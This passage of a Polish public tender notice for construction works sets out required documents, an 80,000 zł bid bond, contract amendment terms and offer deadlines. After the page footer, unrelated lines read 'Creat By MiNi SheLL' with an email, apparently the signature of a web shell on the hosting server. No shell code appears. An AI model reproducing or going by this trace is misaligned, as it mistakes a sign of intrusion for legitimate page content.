(jeżeli są konieczne do wykazania <br/>równoważności);<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia <br/>wykonawcy ci składają wspólnie ww. dokumenty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> opis materiałów, produktów i rozwiązań równoważnych – jeżeli wykonawca <br/>przewiduje ich zastosowanie (w przypadku, o którym mowa w Rozdziale XVI pkt <br/>6 i 7 SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych <br/>materiałów, produktów i rozwiązań (jeżeli są konieczne do wykazania <br/>równoważności) <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego <br/>rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: <br/>wykonawcy lub podmiotu udostępniającego zasoby) jest umocowana do jego <br/>reprezentowania; wykonawca nie jest zobowiązany do złożenia ww. <br/>dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i <br/>ogólnodostępnych baz danych, o ile wykonawca wskazał w załączniku nr 1 do <br/>SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów;<br/>3) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do <br/>reprezentowania (odpowiednio: wykonawcy, podmiotu udostępniającego <br/>zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia), <br/>jeżeli w imieniu (odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, <br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia) działa osoba, <br/>której umocowanie do reprezentowania nie wynika z dokumentów, o których <br/>mowa w pkt 1 ppkt 2;<br/>4) oświadczenie wykonawcy o niepodleganiu wykluczeniu, według wzoru <br/>stanowiącego załącznik nr 2 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie <br/>zamówienia ww. dokument składa każdy z wykonawców.<br/>5) oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 3 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie <br/>zamówienia ww. dokument składa każdy z wykonawców, w zakresie, w jakim <br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>6) oświadczenie wykonawcy o poleganiu na zdolnościach lub sytuacji podmiotów udostępniających zasoby, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>Uwaga! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na <br/>zdolnościach lub sytuacji podmiotu udostępniającego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wadium należy wnieść w wysokości 80 000,00 zł (słownie: osiemdziesiąt tysięcy<br/>złotych) przed upływem terminu składania ofert. Decyduje moment wpływu <br/>środków do zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają <br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>ich w postępowaniu i zawarcia umowy.<br/>2. Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty.<br/>3. Wszelką korespondencję w postępowaniu zamawiający kieruje do pełnomocnika. <br/>4. Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie <br/>zamówienia i mają do nich zastosowanie zasady określone w pkt 1 – 3.<br/>5. Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie <br/>zamówienia będą mieli obowiązek przedstawić zamawiającemu kopię umowy<br/>regulującej współpracę tych wykonawców, zawierającą, co najmniej:<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego <br/>obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2) określenie zakresu działania poszczególnych stron umowy,<br/>3) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący <br/>realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień umowy polegających na:<br/>1)	zmianie terminów rozpoczęcia i zakończenia realizacji przedmiotu umowy; <br/>2)	zmianie wynagrodzenia;<br/>3)	zmianie zasad i terminów dokonywania odbiorów oraz płatności wynagrodzenia;<br/>4)	zmianie sposobu spełnienia oraz zakresu świadczenia;<br/>5)	zmianie osób wskazanych w § 4 ust. 1 projektu umowy;<br/>6)	zmianie końcowego terminu na odstąpienie od umowy, o którym mowa w § 7 ust. 5 projektu umowy; zmiana, o której mowa w niniejszym punkcie będzie możliwa w sytuacji przedłużenia terminu wykonania przedmiotu umowy i nastąpi w zakresie odpowiadającym różnicy pomiędzy pierwotnym terminem wykonania przedmiotu umowy a terminem wynikającym ze zmiany umowy.<br/>2. Z uwagi na limit znaków szczegółowe informacje zawarte są w załączniku nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/umszczecin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawcy zagraniczni: Zamawiający nie wymaga złożenia dokumentów, o których mowa w § 4 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-13 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com